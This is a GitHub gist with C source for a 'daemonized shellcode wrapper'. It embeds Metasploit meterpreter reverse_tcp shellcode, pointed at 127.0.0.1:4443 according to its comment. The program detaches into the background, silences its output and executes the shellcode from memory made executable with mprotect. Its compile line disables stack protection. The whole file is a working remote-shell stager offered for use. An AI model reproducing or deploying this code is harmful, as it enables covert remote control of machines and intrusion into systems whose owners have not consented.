Created
April 29, 2018 00:26
-
-
Save darkerego/4023793bf7a3e326a82ea3e46d6ccd22 to your computer and use it in GitHub Desktop.
wrapper for msf shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Deamonized ShellCode Wrapper | |
| To compile: | |
| $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode | |
| */ | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <sys/mman.h> | |
| #include <sys/stat.h> | |
| /* | |
| * linux/x64/meterpreter/reverse_tcp | |
| * 127.0.0.1 4443 | |
| */ | |
| unsigned char buf []= | |
| "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" | |
| "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x5b\x6a\x0a" | |
| "\x41\x59\x56\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f" | |
| "\x05\x48\x85\xc0\x78\x44\x48\x97\x48\xb9\x02\x00\x11\x5b\x7f" | |
| "\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05" | |
| "\x48\x85\xc0\x79\x1b\x49\xff\xc9\x74\x22\x6a\x23\x58\x6a\x00" | |
| "\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x48\x85\xc0\x79\xb7" | |
| "\xeb\x0c\x59\x5e\x5a\x0f\x05\x48\x85\xc0\x78\x02\xff\xe6\x6a" | |
| "\x3c\x58\x6a\x01\x5f\x0f\x05"; | |
| #define EXIT_SUCCESS 0 | |
| #define EXIT_FAILURE 1 | |
| static void daemonize(void) | |
| { | |
| pid_t pid, sid; | |
| /* already a daemon */ | |
| if ( getppid() == 1 ) return; | |
| /* Fork off the parent process */ | |
| pid = fork(); | |
| if (pid < 0) { | |
| exit(EXIT_FAILURE); | |
| } | |
| /* If we got a good PID, then we can exit the parent process. */ | |
| if (pid > 0) { | |
| exit(EXIT_SUCCESS); | |
| } | |
| /* At this point we are executing as the child process */ | |
| /* Change the file mode mask */ | |
| umask(0); | |
| /* Create a new SID for the child process */ | |
| sid = setsid(); | |
| if (sid < 0) { | |
| exit(EXIT_FAILURE); | |
| } | |
| /* Change the current working directory. This prevents the current | |
| directory from being locked; hence not being able to remove it. */ | |
| if ((chdir("/")) < 0) { | |
| exit(EXIT_FAILURE); | |
| } | |
| /* Redirect standard files to /dev/null */ | |
| freopen( "/dev/null", "r", stdin); | |
| freopen( "/dev/null", "w", stdout); | |
| freopen( "/dev/null", "w", stderr); | |
| } | |
| void main(int argc, char**argv) | |
| { | |
| daemonize(); | |
| void *addr = (void*)((unsigned long)buf & ((0UL - 1UL) ^ 0xfff));/*get memory page*/ | |
| int ans = mprotect(addr, 1, PROT_READ|PROT_WRITE|PROT_EXEC);/*set page attributes*/ | |
| if (ans) | |
| { | |
| exit(EXIT_FAILURE); | |
| } | |
| ((void(*)(void))buf)();/*execute array*/ | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment